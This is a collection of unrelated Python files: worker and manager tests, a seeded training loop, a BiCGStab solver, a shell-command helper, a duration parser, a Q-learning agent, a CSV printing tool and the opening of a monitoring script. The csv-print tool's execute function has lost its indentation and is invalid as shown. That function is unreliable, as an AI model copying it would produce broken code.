    """Task fixture that always fails, for exercising worker error paths."""
    raise RuntimeError("error")
def simple_task_v(v):
    """Echo ``v`` after a random (< 1s) delay, to shuffle completion order."""
    time.sleep(random())
    return v
async def simple_async_task_v(v):
    """Async variant of simple_task_v: echo ``v`` after a random delay."""
    await asyncio.sleep(random())
    return v
@pytest.mark.timeout(10)
def test_process_worker_task():
    """A worker picks a queued task off the bus, runs it, and tears down."""
    worker_spec = ProcessWorkerSpec(
        name="TestProcessWorker",
        idle_timeout=1,
        max_err_count=1,
    )
    # Queue the task before the worker starts so it is picked up immediately.
    task = ProcessTask(name="simple_task", fn=simple_task)
    worker_spec.task_bus.put(task)
    worker = ProcessWorker(worker_spec)
    worker.start()
    response: Action = worker_spec.response_bus.get()
    assert response.result == "done"
    worker.stop()
    assert not worker.is_alive()
    assert not worker.is_idle()
    # Dropping every reference must let the worker be garbage collected.
    ref = weakref.ref(worker)
    del worker_spec, worker, task
    assert ref() is None
@pytest.mark.timeout(10)
def test_processs_worker_async_task():
    """One worker runs several queued coroutine tasks and returns results."""
    worker_spec = ProcessWorkerSpec(
        name="TestThreadWorker",
        max_task_count=3,
        idle_timeout=1,
        max_err_count=1,
    )
    tasks = []
    for i in range(3):
        task = ProcessTask(name="simple_async_task", fn=simple_async_task_v, args=[i])
        tasks.append(task)
        worker_spec.task_bus.put(task)
    worker = ProcessWorker(worker_spec)
    worker.start()
    for i in range(3):
        # NOTE(review): assumes responses come back in submission order --
        # presumably guaranteed by the single worker draining the bus FIFO;
        # confirm against the worker implementation.
        response: Action = worker_spec.response_bus.get()
        assert response.result == i
    worker.stop()
    assert not worker.is_alive()
    assert not worker.is_idle()
    # ``tasks`` still holds all three tasks, but none reference the worker,
    # so deleting the spec/worker/last-task names is enough for collection.
    ref = weakref.ref(worker)
    del worker_spec, worker, task
    assert ref() is None
@pytest.mark.timeout(10)
def test_process_worker_error():
    """A raising task yields an exception response flagged for restart."""
    worker_spec = ProcessWorkerSpec(
        name="TestProcessWorker",
        idle_timeout=1,
        max_err_count=1,
    )
    task = ProcessTask(name="simple_error_task", fn=simple_error_task)
    worker_spec.task_bus.put(task)
    worker = ProcessWorker(worker_spec)
    worker.start()
    response: Action = worker_spec.response_bus.get()
    assert isinstance(response.exception, RuntimeError)
    assert response.match(ACT_EXCEPTION)
    # max_err_count=1, so a single failure should request a worker restart.
    assert response.match(ACT_RESTART)
    worker.stop()
    assert not worker.is_alive()
    assert not worker.is_idle()
@pytest.mark.timeout(10)
def test_process_manager():
    """Manager end-to-end happy path: submit one task, read its future."""
    manager_spec = ProcessManagerSpec()
    manager = ProcessManager(manager_spec)
    manager.start()
    future = manager.submit(simple_task)
    assert future.result() == "done"
    manager.stop()
# Process start-up is slower off Linux (spawn vs fork), hence the longer cap.
@pytest.mark.timeout(20 if sys.platform == "linux" else 60)
@pytest.mark.asyncio
async def test_process_manager_high_concurrency():
    """Many concurrent submissions each resolve to their own input value."""
    with ProcessManager(ProcessManagerSpec()) as manager:
        futures = []
        for i in range(32):
            futures.append(manager.submit(simple_task_v, (i,)))
        for i, future in enumerate(futures):
            assert await future == i
@pytest.mark.skipif(skip_cloudpickle_test, reason="cloudpickle is not installed")
@pytest.mark.timeout(10)
def test_cloudpickle_process_manager():
    """With cloudpickle available, closures, async closures and lambdas --
    none of which plain pickle can serialize -- are all submittable."""
    def clousure_task():
        return "done"
    async def async_clousure_task():
        return "done"
    lambda_task = lambda x: x  # noqa: E731
    manager_spec = ProcessManagerSpec()
    manager = ProcessManager(manager_spec)
    manager.start()
    future = manager.submit(clousure_task)
    assert future.result() == "done"
    future = manager.submit(async_clousure_task)
    assert future.result() == "done"
    future = manager.submit(lambda_task, args=("done",))
    assert future.result() == "done"
    manager.stop()
|
##############################################################################################################################################################
##############################################################################################################################################################
"""
Repeat training of classification model for different seeds.
Replace or modify the config file in the following part of the code to make changes to train different models.
# load the config file
config = toml.load("cfg/pretrained_classifier.toml")
"""
#####################################################################################################################################################
#####################################################################################################################################################
import toml
import torch
import random
import numpy as np
from train_classifier import train
#####################################################################################################################################################
#####################################################################################################################################################
if __name__ == '__main__':
    # Load the experiment configuration once; it is shared by every run.
    config = toml.load("cfg/pretrained_classifier.toml")

    # Repeat training for ten fixed seeds so results are comparable.
    for seed in range(1, 11):
        banner = "-" * 77
        print(banner)
        print("Running experiment for seed: ", seed)
        print(banner)

        # Reproducibility: seed every RNG and force deterministic cuDNN.
        torch.manual_seed(seed)
        torch.cuda.manual_seed(seed)
        torch.cuda.manual_seed_all(seed)
        torch.backends.cudnn.deterministic = True
        torch.backends.cudnn.benchmark = False
        np.random.seed(seed)
        random.seed(seed)

        # Run the training for this seed.
        train(config)
##################################################################################################################################################### |
import numpy as np
import numpy.typing as npt
import iterations_lib.python_inspectors_diag.utils as utils
from typing import Tuple
def BiCGStab_solver(complex_matrix: np.ndarray,
                    f_vector: np.ndarray,
                    u0_vector: np.ndarray = None,
                    eps: float = 10e-7,
                    n_iter: int = 10000) -> Tuple[np.ndarray, np.ndarray, np.ndarray,
                                                  np.ndarray, np.ndarray, np.ndarray,
                                                  np.ndarray, np.ndarray, np.ndarray,
                                                  np.ndarray, np.ndarray]:
    """
    Biconjugate gradient stabilized (BiCGStab) solver that records the full
    iteration history of every intermediate quantity.

    Van der Vorst, Henk. (2003). Iterative Krylov Methods for Large Linear Systems. 13. 10.1017/CBO9780511615115.

    :param complex_matrix: system matrix A (applied via utils.matrix_diag_prod)
    :param f_vector: right-hand side f
    :param u0_vector: initial guess; defaults to a vector of ones
    :param eps: relative stopping tolerance
                (NOTE(review): 10e-7 == 1e-6 -- confirm 1e-7 was not intended)
    :param n_iter: maximum number of iterations
    :return: history arrays (u, iteration counts, r, v, p, s, t, alpha, beta,
             omega, rho); row i corresponds to iteration i
    """
    # Initial guess.
    if u0_vector is None:
        u0_vector = np.ones(f_vector.shape[0], dtype=complex)
    # History matrix of iterates.
    u_vector = np.zeros((1, len(u0_vector)), dtype=complex)
    u_vector[0] = u0_vector.copy()
    # Force complex dtype for the matrix and the right-hand side.
    complex_matrix = np.array(complex_matrix, dtype=complex)
    f_vector = np.array(f_vector, dtype=complex)
    r = np.zeros((1, complex_matrix.shape[0]), dtype=complex)
    r[0] = f_vector - utils.matrix_diag_prod(complex_matrix, u_vector[0])
    # Shadow residual r~ (kept fixed over the iterations).
    r_tild = np.zeros((complex_matrix.shape[0], ), dtype=complex)
    r_tild = r[0].copy()
    v = np.zeros((1, complex_matrix.shape[0]), dtype=complex)
    p = np.zeros((1, complex_matrix.shape[0]), dtype=complex)
    s = np.zeros((1, complex_matrix.shape[0]), dtype=complex)
    t = np.zeros((1, complex_matrix.shape[0]), dtype=complex)
    beta = np.zeros((1, ), dtype=float)
    rho = np.ones((1, ), dtype=float)
    alpha = np.ones((1,), dtype=float)
    omega = np.ones((1,), dtype=float)
    iter_space = np.zeros((1, ), dtype=int)
    iter_space[0] = 1
    for iter_index in range(1, n_iter):
        new_rho = utils.vec_dot_complex_prod_bicg(r_tild, r[iter_index - 1])
        rho = np.concatenate((rho, new_rho.reshape((1, ))), axis=0)
        new_beta = (rho[iter_index] / rho[iter_index - 1]) * (alpha[iter_index - 1] / omega[iter_index - 1])
        beta = np.concatenate((beta, new_beta.reshape((1, ))), axis=0)
        # Bug fix: the search-direction recurrence is
        #   p_i = r_{i-1} + beta_i * (p_{i-1} - omega_{i-1} * v_{i-1})
        # (Van der Vorst); the previous code used the scalar rho[i-1] in
        # place of the direction vector p[i-1].
        new_p = r[iter_index - 1] + beta[iter_index] * (p[iter_index - 1] - omega[iter_index - 1] * v[iter_index - 1])
        p = np.concatenate((p, new_p.reshape((1, -1))), axis=0)
        new_v = utils.matrix_diag_prod(complex_matrix, p[iter_index])
        v = np.concatenate((v, new_v.reshape((1, -1))), axis=0)
        new_alpha = rho[iter_index] / utils.vec_dot_complex_prod_bicg(r_tild, v[iter_index])
        alpha = np.concatenate((alpha, new_alpha.reshape((1, ))), axis=0)
        new_s = r[iter_index - 1] - alpha[iter_index] * v[iter_index]
        s = np.concatenate((s, new_s.reshape((1, -1))), axis=0)
        new_t = utils.matrix_diag_prod(complex_matrix, s[iter_index])
        t = np.concatenate((t, new_t.reshape((1, -1))), axis=0)
        new_omega = utils.vec_dot_real_prod(t[iter_index], s[iter_index]) / \
            utils.vec_dot_real_prod(t[iter_index], t[iter_index])
        omega = np.concatenate((omega, new_omega.reshape((1, ))), axis=0)
        new_u = u_vector[iter_index - 1] + omega[iter_index] * s[iter_index] + alpha[iter_index] * p[iter_index]
        u_vector = np.concatenate((u_vector, new_u.reshape((1, -1))), axis=0)
        new_r = s[iter_index] - omega[iter_index] * t[iter_index]
        r = np.concatenate((r, new_r.reshape((1, -1))), axis=0)
        # Each iteration costs two matrix-vector products.
        iter_space = np.concatenate((iter_space, np.array(iter_space[iter_index - 1] + 2).reshape((1,))), axis=0)
        # Relative change of the iterate as the stopping criterion.
        difference = utils.l2_norm(u_vector[iter_index] - u_vector[iter_index - 1]) / utils.l2_norm(f_vector)
        if difference < eps:
            break
    return u_vector, iter_space, r, v, p, s, t, alpha, beta, omega, rho
def _main():
    """Smoke test: solve a diagonal system and compare with the exact answer."""
    diag_matrix = np.array((0.5, 1, 1.5, 2, 2.5))
    rhs = np.array((1, 2, 3, 4, 5))
    solution_history, iteration_history = BiCGStab_solver(diag_matrix, rhs)[:2]
    # For a diagonal matrix the exact solution is the element-wise quotient.
    exact_solution = rhs / diag_matrix
    print("Real_Solve")
    print(exact_solution)
    print("\nIterations Solve")
    print(solution_history[-1])
    print("\nIterations Space")
    print(iteration_history)
    return 0


if __name__ == "__main__":
    _main()
|
# -*- coding: utf-8 -*-
# Copyright 2018 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from asyncio.subprocess import PIPE
import asyncio
import logging
async def run(cmd, timeout=None):
    """Run a shell command and return its stripped (stdout, stderr) text.

    Raises asyncio.TimeoutError if the command exceeds ``timeout`` seconds
    (the process is terminated and reaped first) and a generic Exception
    when the command exits non-zero.
    """
    try:
        proc = await asyncio.create_subprocess_shell(
            cmd, stdout=PIPE, stderr=PIPE)
        out, err = await asyncio.wait_for(proc.communicate(), timeout)
    except asyncio.TimeoutError:
        logging.info(f'command timed out: timeout={timeout} cmd={cmd}')
        proc.terminate()
        # Bug fix: reap the terminated process so it does not linger as a
        # zombie; the bare ``raise`` also keeps the original traceback.
        await proc.wait()
        raise
    # NOTE(review): assumes the command emits ASCII only; non-ASCII output
    # will raise UnicodeDecodeError -- confirm callers guarantee this.
    out = out.decode('ascii').rstrip()
    err = err.decode('ascii').rstrip()
    logging.debug('stdout: ' + out)
    logging.debug('stderr: ' + err)
    if proc.returncode != 0:
        ret = proc.returncode
        raise Exception(f'command returned {ret}: err={err} cmd={cmd}')
    return out, err
|
"""A poor substitute for PHP's strtotime function."""
# =============================================================================
# CONTENTS
# -----------------------------------------------------------------------------
# phlsys_strtotime
#
# Public Functions:
# describe_duration_string_to_time_delta
# duration_string_to_time_delta
#
# -----------------------------------------------------------------------------
# (this contents block is generated, edits will be lost)
# =============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
def describe_duration_string_to_time_delta():
    """Return a human-readable description of the duration string format."""
    return ('time can be specified like "5 hours 20 minutes", use '
            'combinations of seconds, minutes, hours, days, weeks. '
            'each unit should only appear once. you may use floating '
            'point numbers and negative numbers. '
            'e.g. "1 weeks -1.5 days".')
def duration_string_to_time_delta(s):
    """Return a datetime.timedelta based on the supplied string 's'.
    Usage examples:
    >>> str(duration_string_to_time_delta("1 seconds"))
    '0:00:01'
    >>> str(duration_string_to_time_delta("2 minutes"))
    '0:02:00'
    >>> str(duration_string_to_time_delta("2 hours 2 minutes"))
    '2:02:00'
    >>> str(duration_string_to_time_delta("1 days 2 hours 2 minutes"))
    '1 day, 2:02:00'
    >>> str(duration_string_to_time_delta("1.5 days"))
    '1 day, 12:00:00'
    >>> str(duration_string_to_time_delta("1 days -1 hours"))
    '23:00:00'
    >>> str(duration_string_to_time_delta("1 milliseconds"))
    '0:00:00.001000'
    :s: a string in the appropriate time format
    :returns: a datetime.timedelta
    """
    clauses = s.split()
    if len(clauses) % 2:
        raise ValueError("odd number of clauses: " + s)
    # Bug fix: materialize the pairs. Under Python 3 ``zip`` returns a
    # one-shot iterator with no len(), so the duplicate-clause check below
    # raised TypeError (and the iterator was already exhausted by the dict
    # comprehension anyway).
    pairs = list(zip(clauses[::2], clauses[1::2]))
    d = {p[1]: float(p[0]) for p in pairs}
    if len(d) != len(pairs):
        raise ValueError("duplicated clauses: " + s)
    return datetime.timedelta(**d)
# -----------------------------------------------------------------------------
# Copyright (C) 2013-2014 Bloomberg Finance L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------ END-OF-FILE ----------------------------------
|
from typing import List
from ..Agent import Agent
import numpy as np
class QLearning(Agent):
    """Tabular Q-learning agent with eps-greedy exploration.

    State-action values live in a dict keyed by (state, action) pairs.
    """

    def __init__(self, actions: List, alpha: float, gamma: float, eps: float):
        """
        Args:
            actions: List of available actions.
            alpha: Learning rate.
            gamma: Discount factor.
            eps: Exploration probability for eps-greedy action selection.
        """
        super().__init__()
        self.actions = actions
        self.alpha = alpha
        self.gamma = gamma
        self.eps = eps
        self.q = {}                 # (state, action) -> estimated value
        self.prev_state = None      # last state acted from
        self.prev_action = None     # last action taken

    def _action_value(self, state, action):
        """ Compute state-action value of this pair.

        NOTE(review): unseen pairs get a *fresh* random value on every call
        (it is not stored), so repeated queries of the same unseen pair can
        disagree -- confirm this tie-breaking noise is intentional.
        """
        return self.q.get((state, action), 1e-2*np.random.randn())

    def _get_action(self, state, eps):
        """ Return an eps-greedy action to be taken from this state. """
        if np.random.rand() < eps:
            return np.random.choice(self.actions)
        action = max(self.actions, key=lambda action: self._action_value(
            state=state, action=action))
        return action

    def update(self, state, reward):
        """ Update state-action value of previous (state, action).
        Args:
            state (Any): The new state representation.
            reward (float): Reward received upon the transaction to `state`.
        Note:
            - The parameter ``state`` should be an immutable type since it's used as a key.
        """
        state = self.decode_state(state)
        q = self._action_value(state=self.prev_state, action=self.prev_action)
        # TD error: reward + gamma * max_a Q(state, a) - Q(prev) --
        # _get_action with eps=0 is the greedy argmax.
        tmp = reward - q
        tmp += self.gamma * \
            self._action_value(state, self._get_action(state, 0))
        self.q[(self.prev_state, self.prev_action)] = q + self.alpha * tmp

    def take_action(self, state):
        """ Choose an eps-greedy action to be taken from this state.
        Args:
            state (Any): The current state representation. It should be an immutable type since it's used as a key.
        """
        state = self.decode_state(state)
        action = self._get_action(state, self.eps)
        self.prev_action = action
        self.prev_state = state
        return action

    def save(self, path: str):
        """ Save state-action value table in `path`.npy
        Args:
            path (str): The location of where to store the state-action value table.
        """
        super().save(path)
        np.save(path + '.npy', self.q)

    def load(self, path):
        """ Load state-action value table.
        If it doesn't exist, a randomly-initialized table is used.
        Args:
            path (str): The location of where the state-action value table resides.
        """
        try:
            self.q = np.load(path + '.npy', allow_pickle=True).item()
        except (OSError, ValueError):
            # Bug fix: the previous bare ``except`` also swallowed
            # KeyboardInterrupt/SystemExit and hid programming errors;
            # catch only load failures (missing/corrupt file).
            self.q = {}
            print("No file is found in:", path)
|
## Copyright (c) 2016 Upstream Research, Inc. All Rights Reserved. ##
## Subject to an 'MIT' License. See LICENSE file in top-level directory ##
help_text = (
"CSV-PRINT tool version 20170220:20170605\n"
"Prints a fixed-width representation of a CSV file\n"
"\n"
"csv-print [OPTIONS] [InputFile]\n"
"\n"
"OPTIONS\n"
" -H Don't skip the header row when analyzing column width\n"
" -K {N} Number of input rows to skip (not including header)\n"
" -N {N} Number of input rows to analyze for column widths (default=1)\n"
" -n {N} Number of rows to print (default=all)\n"
" -o {F} Output file name\n"
" --min-width {N} Minimum column width (default=1)\n"
" --max-width {N} Maximum column width (default=unbounded)\n"
" --widths Comma-separated list of column widths\n"
"\n"
)
import sys
import csv
import io
from ._csv_helpers import (
decode_delimiter_name
,decode_charset_name
,decode_newline
)
def main(arg_list, stdin, stdout, stderr):
    """Command-line entry point for the csv-print tool.

    Parses ``arg_list`` (argv-style, program name at index 0), opens the
    input/output streams and delegates the printing to execute().

    Bug fix: every value-taking option used to check ``arg_index < arg_count``
    before consuming the NEXT argument, so an option given as the last
    argument (e.g. ``csv-print -o``) raised IndexError. The guards now check
    ``arg_index + 1 < arg_count``; a trailing option with no value is ignored.
    """
    in_io = stdin
    out_io = stdout
    err_io = stderr
    show_help = False
    input_file_name = None
    output_file_name = None
    input_delimiter = ','
    output_delimiter = ' '
    # 'std' will be translated to the standard line break decided by csv_helpers.decode_newline
    input_row_terminator = 'std'
    output_row_terminator = 'std'
    input_charset_name = 'utf_8_sig'
    output_charset_name = 'utf_8'
    csv_cell_width_limit = 4*1024*1024  # python default is 131072 = 0x00020000
    input_row_start_offset = 0
    column_name_list_string = None
    column_width_list_string = None
    analyze_row_count_string = None
    out_row_count_max_string = None
    column_width_min_string = None
    column_width_max_string = None
    analyze_row_count = 1
    out_row_count_max = None
    column_width_min = 1
    column_width_max = None
    truncation_symbol = "-"
    should_analyze_header_row = False
    # [20160916 [db] I avoided using argparse in order to retain some flexibility for command syntax]
    # Hand-rolled option scanner: each value-taking option consumes the
    # following argument; the first non-option argument is the input file.
    arg_count = len(arg_list)
    arg_index = 1
    while (arg_index < arg_count):
        arg = arg_list[arg_index]
        if (arg == "--help"
            or arg == "-?"
            ):
            show_help = True
        elif (arg == "-o"
            or arg == "--output"
            ):
            if (arg_index + 1 < arg_count):
                arg_index += 1
                arg = arg_list[arg_index]
                output_file_name = arg
        elif (arg == "-E"
            or arg == "--charset-in"
            or arg == "--encoding-in"
            ):
            if (arg_index + 1 < arg_count):
                arg_index += 1
                arg = arg_list[arg_index]
                input_charset_name = arg
        elif (arg == "-e"
            or arg == "--charset-out"
            or arg == "--encoding-out"
            ):
            if (arg_index + 1 < arg_count):
                arg_index += 1
                arg = arg_list[arg_index]
                output_charset_name = arg
        elif (arg == "-S"
            or arg == "--separator-in"
            or arg == "--delimiter-in"
            ):
            if (arg_index + 1 < arg_count):
                arg_index += 1
                arg = arg_list[arg_index]
                input_delimiter = arg
        elif (arg == "-s"
            or arg == "--separator-out"
            or arg == "--delimiter-out"
            ):
            if (arg_index + 1 < arg_count):
                arg_index += 1
                arg = arg_list[arg_index]
                output_delimiter = arg
        elif (arg == "-W"
            or arg == "--terminator-in"
            or arg == "--newline-in"
            or arg == "--endline-in"
            ):
            if (arg_index + 1 < arg_count):
                arg_index += 1
                arg = arg_list[arg_index]
                input_row_terminator = arg
        elif (arg == "-w"
            or arg == "--terminator-out"
            or arg == "--newline-out"
            or arg == "--endline-out"
            ):
            if (arg_index + 1 < arg_count):
                arg_index += 1
                arg = arg_list[arg_index]
                output_row_terminator = arg
        elif (arg == "--cell-width-limit"
            ):
            if (arg_index + 1 < arg_count):
                arg_index += 1
                arg = arg_list[arg_index]
                csv_cell_width_limit = int(arg)
        elif (arg == "-K"
            or arg == "--row-offset-in"
            or arg == "--offset"
            or arg == "--skip"
            ):
            if (arg_index + 1 < arg_count):
                arg_index += 1
                arg = arg_list[arg_index]
                input_row_start_offset = int(arg)
        elif (arg == "-N"
            or arg == "--analyze-row-count"
            ):
            if (arg_index + 1 < arg_count):
                arg_index += 1
                arg = arg_list[arg_index]
                analyze_row_count_string = arg
        elif (arg == "-n"
            or arg == "--out-row-count-max"
            ):
            if (arg_index + 1 < arg_count):
                arg_index += 1
                arg = arg_list[arg_index]
                out_row_count_max_string = arg
        elif (arg == "--min-width"
            ):
            if (arg_index + 1 < arg_count):
                arg_index += 1
                arg = arg_list[arg_index]
                column_width_min_string = arg
        elif (arg == "--max-width"
            ):
            if (arg_index + 1 < arg_count):
                arg_index += 1
                arg = arg_list[arg_index]
                column_width_max_string = arg
        elif (arg == "--select"
            or arg == "--select-columns"
            ):
            if (arg_index + 1 < arg_count):
                arg_index += 1
                arg = arg_list[arg_index]
                column_name_list_string = arg
        elif (arg == "--column-widths"
            ):
            if (arg_index + 1 < arg_count):
                arg_index += 1
                arg = arg_list[arg_index]
                column_width_list_string = arg
        elif (arg == "--truncation-symbol"
            ):
            if (arg_index + 1 < arg_count):
                arg_index += 1
                arg = arg_list[arg_index]
                truncation_symbol = arg
        elif (arg == "-H"
            or arg == "--analyze-header"
            ):
            should_analyze_header_row = True
        elif (None != arg
            and 0 < len(arg)
            ):
            # First positional argument is the input file; any extra
            # positional arguments are silently ignored (pre-existing
            # behavior, kept for compatibility).
            if (None == input_file_name):
                input_file_name = arg
        arg_index += 1
    if (show_help):
        out_io.write(help_text)
    else:
        # set global CSV column width
        if (None != csv_cell_width_limit):
            csv.field_size_limit(csv_cell_width_limit)
        # Translate symbolic option values into their concrete forms.
        input_charset_name = decode_charset_name(input_charset_name)
        output_charset_name = decode_charset_name(output_charset_name)
        input_row_terminator = decode_newline(input_row_terminator)
        output_row_terminator = decode_newline(output_row_terminator)
        input_delimiter = decode_delimiter_name(input_delimiter)
        output_delimiter = decode_delimiter_name(output_delimiter)
        in_file = None
        out_file = None
        try:
            if (None != out_row_count_max_string):
                if ("all" == out_row_count_max_string.lower()):
                    out_row_count_max = None
                else:
                    out_row_count_max = int(out_row_count_max_string)
            if (None != analyze_row_count_string):
                if ("all" == analyze_row_count_string.lower()):
                    analyze_row_count = None
                else:
                    analyze_row_count = int(analyze_row_count_string)
            # ensure the number of rows to analyze is not greater
            # than the number of rows to output
            if (None != out_row_count_max
                and (None == analyze_row_count
                    or out_row_count_max < analyze_row_count
                    )
                ):
                analyze_row_count = out_row_count_max
            if (None != column_width_min_string):
                column_width_min = int(column_width_min_string)
            if (None != column_width_max_string):
                if ("unbounded" == column_width_max_string.lower()
                    or "infinite" == column_width_max_string.lower()
                    or "inf" == column_width_max_string.lower()
                    ):
                    column_width_max = None
                else:
                    column_width_max = int(column_width_max_string)
            column_name_list = None
            if (None != column_name_list_string):
                column_name_list = column_name_list_string.split(",")
            # Parse the fixed column widths; empty entries mean "auto".
            column_width_list = None
            if (None != column_width_list_string):
                column_width_list = []
                column_width_string_list = column_width_list_string.split(",")
                for column_width_string in column_width_string_list:
                    column_width = None
                    if (0 < len(column_width_string)):
                        column_width = int(column_width_string)
                    column_width_list.append(column_width)
            # Open files (if given); otherwise keep the provided streams.
            if (None != input_file_name):
                read_text_io_mode = 'rt'
                #in_newline_mode = ''  # don't translate newline chars
                in_newline_mode = input_row_terminator
                in_file = io.open(input_file_name, mode=read_text_io_mode, encoding=input_charset_name, newline=in_newline_mode)
                in_io = in_file
            if (None != output_file_name):
                write_text_io_mode = 'wt'
                out_newline_mode=''  # don't translate newline chars
                out_file = io.open(output_file_name, mode=write_text_io_mode, encoding=output_charset_name, newline=out_newline_mode)
                out_io = out_file
            in_csv = csv.reader(in_io, delimiter=input_delimiter, lineterminator=input_row_terminator)
            execute(
                in_csv
                ,out_io
                ,output_delimiter
                ,output_row_terminator
                ,truncation_symbol
                ,column_name_list
                ,column_width_list
                ,input_row_start_offset
                ,analyze_row_count
                ,out_row_count_max
                ,column_width_min
                ,column_width_max
                ,should_analyze_header_row
                )
        except BrokenPipeError:
            # Downstream pager/pipe closed early; exit quietly.
            pass
        finally:
            if (None != in_file):
                in_file.close()
            if (None != out_file):
                out_file.close()
def execute(
in_csv
,out_io
,output_delimiter
,output_row_terminator
,truncation_symbol
,column_name_list
,column_width_fixed_list
,skip_row_count
,analyze_row_count
,out_row_count_max
,column_width_min
,column_width_max
,should_analyze_header_row
):
end_row = None
newline = '\n'
in_header_row = next(in_csv, end_row)
out_header_row = None
if (end_row != in_header_row):
# [20170220 [db] This code for finding the column offsets comes from
# the csv-select tool, i thought it would be helpful to incorporate it here
# although i think it violates the "do one thing and do it well" rule]
# default to inclusion of all input columns in the output
if (None == column_name_list):
column_name_list = list(in_header_row)
# make a list of column offsets, and fixup the column names
out_header_row = []
column_position_map = []
out_column_position = 0
while (out_column_position < len(column_name_list)):
out_column_name = column_name_list[out_column_position]
out_column_name = out_column_name.strip()
out_column_name_norm = out_column_name.lower()
in_column_position = 0
found_column_position = None
while (in_column_position < len(in_header_row)
and None == found_column_position
):
in_column_name = in_header_row[in_column_position]
in_column_name_norm = in_column_name.strip().lower()
if (in_column_name_norm == out_column_name_norm):
found_column_position = in_column_position
in_column_position += 1
column_position_map.append(found_column_position)
out_header_row.append(out_column_name)
out_column_position += 1
# skip rows if necessary
in_row_count = 0
in_row = in_header_row
while (in_row_count < skip_row_count
and end_row != in_row
):
in_row_count += 1
in_row = next(in_csv, end_row)
# figure out the row widths
column_width_list = []
row_count = 0
in_row_list = []
if (not should_analyze_header_row):
# if we are not going to analyze the header row,
# then add it to our row list buffer now so it will get printed later.
in_row_list.append(in_header_row)
if (None == analyze_row_count
or 0 < analyze_row_count
):
if (should_analyze_header_row):
in_row = in_header_row
else:
in_row = next(in_csv, end_row)
while (end_row != in_row
and (None == analyze_row_count
or row_count < analyze_row_count
)
):
in_column_position = 0
while (in_column_position < len(in_row)):
cell_value = in_row[in_column_position]
cell_width = 0
if (None != cell_value):
# we need to check for newlines, the cell_width is the longest line
cell_value = normalize_newlines(cell_value)
cell_line_list = cell_value.split(newline)
cell_line_length_list = map(len, cell_line_list)
cell_width = max(cell_line_length_list)
#cell_width = len(cell_value)
if (in_column_position == len(column_width_list)):
column_width_list.append(column_width_min)
column_width = column_width_list[in_column_position]
column_width_fixed = None
if (None != column_width_fixed_list
and in_column_position < len(column_width_fixed_list)
):
column_width_fixed = column_width_fixed_list[in_column_position]
if (None != column_width_fixed):
column_width = column_width_fixed
elif (column_width < cell_width):
if (column_width_max != None
and column_width_max < cell_width
):
column_width = column_width_max
else:
column_width = cell_width
column_width_list[in_column_position] = column_width
in_column_position += 1
in_row_list.append(in_row)
row_count += 1
if ((None == analyze_row_count
or row_count < analyze_row_count
)):
in_row = next(in_csv, end_row)
# write the rows
row_count = 0
row_list_position = 0
if (row_list_position < len(in_row_list)):
in_row = in_row_list[row_list_position]
row_list_position += 1
else:
in_row = next(in_csv, end_row)
while (end_row != in_row
and (None == out_row_count_max or row_count < out_row_count_max)
):
has_wrapped_cell = False
wrap_row = []
out_row = []
out_column_position = 0
while (out_column_position < len(column_position_map)):
in_column_position = column_position_map[out_column_position]
cell_value = None
if (None != in_column_position
and in_column_position < len(in_row)
):
cell_value = in_row[in_column_position]
column_width = None
if (None != in_column_position
and in_column_position < len(column_width_list)
):
column_width = column_width_list[in_column_position]
if (None == column_width):
column_width = column_width_min
out_cell_value = cell_value
if (None == out_cell_value):
out_cell_value = ""
out_cell_value = normalize_newlines(out_cell_value)
(out_cell_value, wrap_cell_value) = split_head_str(out_cell_value, newline)
wrap_row.append(wrap_cell_value)
if (None != wrap_cell_value):
has_wrapped_cell = True
if (column_width < len(out_cell_value)):
if (0 < column_width):
if (None == truncation_symbol):
out_cell_value = out_cell_value[0:column_width]
elif (len(truncation_symbol) <= column_width):
out_cell_value = out_cell_value[0:column_width-len(truncation_symbol)]
out_cell_value += truncation_symbol
elif (len(truncation_symbol) > column_width):
out_cell_value = truncation_symbol[0:column_width]
else:
out_cell_value = ""
elif (column_width > len(out_cell_value)):
out_cell_value = out_cell_value.ljust(column_width)
out_row.append(out_cell_value)
out_column_position += 1
out_line = output_delimiter.join(out_row) + output_row_terminator
out_io.write(out_line)
# if some cell values have newlines in them,
# then we must write another wrapped line of text
# this does not count as a "row" of output
if (has_wrapped_cell):
in_row = wrap_row
elif (row_list_position < len(in_row_list)):
row_count += 1
in_row = in_row_list[row_list_position]
row_list_position += 1
else:
row_count += 1
in_row = next(in_csv, end_row)
# ensure all newline symbols are normalized to be line-feed only
def normalize_newlines(in_str):
    """Return *in_str* with CRLF and lone CR collapsed to LF; None passes through."""
    if in_str is None:
        return None
    return in_str.replace('\r\n', '\n').replace('\r', '\n')
# split a string at the first separator found
# and return a pair/tuple of the head and the tail
def split_head_str(in_str, sep):
    """Split *in_str* at the first *sep*.

    Returns (head, tail); tail is None when *sep* is absent, and both are
    None when either argument is None.
    """
    if in_str is None or sep is None:
        return (None, None)
    pos = in_str.find(sep)
    if pos < 0:
        return (in_str, None)
    return (in_str[:pos], in_str[pos + len(sep):])
def console_main():
    """CLI entry point: run main() with this process's argv and standard streams."""
    main(sys.argv, sys.stdin, sys.stdout, sys.stderr)
if __name__ == "__main__":
    console_main()
|
#!/usr/bin/python
from __future__ import print_function
#from subprocess import Popen, PIPE
from subprocess import check_output, CalledProcessError, STDOUT
from datetime import datetime
import json
import logging
import pdb
import os
import shlex
import sys
import argparse
def parseargs():
    """Define and evaluate the command-line interface for this script.

    :return: argparse.Namespace with configfile (required), logfile and mode
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-c", "--configfile", required=True, action='store',
                        help="name of config json")
    parser.add_argument("-l", "--logfile", action='store',
                        default='check_and_act.log', help="name of log file")
    parser.add_argument("-m", "--mode", action='store', default='cmds.log',
                        help="mode - either cmds or events")
    return parser.parse_args()
# define logging details
